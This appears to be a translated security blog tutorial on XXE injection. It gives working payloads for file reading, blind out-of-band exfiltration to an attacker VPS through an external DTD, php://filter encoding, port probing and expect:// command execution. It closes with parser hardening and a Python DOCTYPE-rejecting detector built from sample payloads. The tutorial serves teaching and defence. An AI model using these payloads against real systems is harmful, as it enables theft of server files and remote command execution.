Web Vulnerabilities | XXE Explained (XML External Entity Injection)
Posted by 谢公子学安全
Contents
XXE
XXE demonstration (arbitrary file read)
Blind OOB XXE
Directory listing and arbitrary file read
Port scanning
Remote code execution
Finding XXE vulnerabilities
Defending against XXE
```xml
<!DOCTYPE a [
<!ENTITY b SYSTEM "file:///etc/passwd">
]>
<a>&b;</a>
```

```xml
<a>&b;</a> <!-- where http://mark4z5.com/evil.dtd contains <!ENTITY b SYSTEM "file:///etc/passwd"> -->
<a>%b;</a> <!-- where http://mark4z5.com/evil.dtd contains <!ENTITY b SYSTEM "file:///etc/passwd"> -->
```
- OOB (Out-of-Band): a Blind XXE vulnerability can be used to build an out-of-band (OOB) channel through which the data is read back.
- Error-based: construct a DTD so that the data is returned inside the parser's error message.
xml.dtd served from the VPS:

```xml
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://VPS的地址:2121/%file;'>">
%all;
```
DTD of the submitted document, which loads xml.dtd and declares the file to read:

```xml
<!ENTITY % remote SYSTEM "http://VPS的http服务/xml.dtd">
<!ENTITY % file SYSTEM "file:///C:/Users/mi/Desktop/1.txt">
%remote;
%send;
]>
```
The same DTD with the file contents base64-encoded through a PHP stream filter, so that characters that would otherwise break the URL survive:

```xml
<!ENTITY % remote SYSTEM "http://VPS的http服务/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/Users/mi/Desktop/1.txt">
%remote;
%send;
]>
```
```xml
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" >
]>
```
```xml
<!ENTITY xxe SYSTEM "expect://id" >]>
<catalog>
<core id="test101">
<author>John, Doe</author>
<title>I love XML</title>
<category>Computers</category>
<price>9.99</price>
<date>2018-10-01</date>
<description>&xxe;</description>
</core>
</catalog>
```

Response returned by the application:

```
{"error": "no results for description uid=0(root) gid=0(root) groups=0(root)...
```
PHP:

```php
libxml_disable_entity_loader(true);
```

Java:

```java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
```

Python:

```python
from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
```
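As an added defensive example (my own code, not from the original post), the following Python refuses any inbound document that carries a DOCTYPE before it ever reaches the parser, and classifies what a rejected document was attempting so the rejection can be logged usefully. The sample documents are constructed here from the payload shapes shown above (file read, parameter-entity OOB with php://filter, loopback port probe, expect://); `attacker.example` is a placeholder host and the function names are my own. Refusing the DOCTYPE outright is stricter than only disabling entity expansion, since it also rules out parameter entities and external DTDs in one check.

```python
import re
import xml.etree.ElementTree as ET

# A service that accepts untrusted XML never needs a DTD, so the safest rule
# is to refuse any document that carries one. Everything below builds on that.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.I)

# Finer-grained indicators, used only to enrich the rejection log so that an
# analyst can tell a file-read attempt from an OOB or expect:// attempt.
INDICATORS = {
    "external_entity": re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.I),
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    "file_scheme": re.compile(rb"file://", re.I),
    "php_filter": re.compile(rb"php://filter", re.I),
    "expect_scheme": re.compile(rb"expect://", re.I),
    "loopback_url": re.compile(rb"https?://(?:127\.0\.0\.1|localhost)\b", re.I),
}


class UnsafeXML(ValueError):
    """Raised when an inbound document declares a DTD."""


def classify(xml_bytes: bytes) -> list:
    """Return the sorted list of indicator names present in the document."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(xml_bytes))


def safe_parse(xml_bytes: bytes) -> ET.Element:
    """Parse untrusted XML, refusing anything that declares a DOCTYPE."""
    if DOCTYPE_RE.search(xml_bytes):
        raise UnsafeXML("DOCTYPE rejected; indicators=" + ",".join(classify(xml_bytes)))
    # Reached only for DTD-less input, so no entity can have been declared.
    return ET.fromstring(xml_bytes)


def check(xml_bytes: bytes):
    """Non-raising wrapper returning (accepted, root_tag_or_None, indicators)."""
    try:
        root = safe_parse(xml_bytes)
    except UnsafeXML:
        return False, None, classify(xml_bytes)
    except ET.ParseError:
        return False, None, ["malformed"]
    return True, root.tag, []


# Constructed samples modelled on the payloads discussed in the post.
# attacker.example is a placeholder for the attacker-controlled host.
SAMPLES = {
    "file_read": b'<?xml version="1.0"?><!DOCTYPE a [<!ENTITY b SYSTEM "file:///etc/passwd">]><a>&b;</a>',
    "oob_php_filter": (
        b'<?xml version="1.0"?><!DOCTYPE data [\n'
        b'<!ENTITY % remote SYSTEM "http://attacker.example/xml.dtd">\n'
        b'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/Users/mi/Desktop/1.txt">\n'
        b'%remote;\n%send;\n]><data>x</data>'
    ),
    "port_probe": b'<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]><a>&xxe;</a>',
    "expect_rce": b'<!DOCTYPE a [<!ENTITY xxe SYSTEM "expect://id" >]><a>&xxe;</a>',
    "benign": b'<?xml version="1.0"?><catalog><core id="test101"><title>I love XML</title></core></catalog>',
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(name, check(doc))
```

The DOCTYPE check runs on the raw bytes before any parser is involved, so it does not depend on which XML library is configured how; the indicator list is purely for detection and alerting and never influences the accept/reject decision.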
Source: 谢公子's blog
Editor: Zuo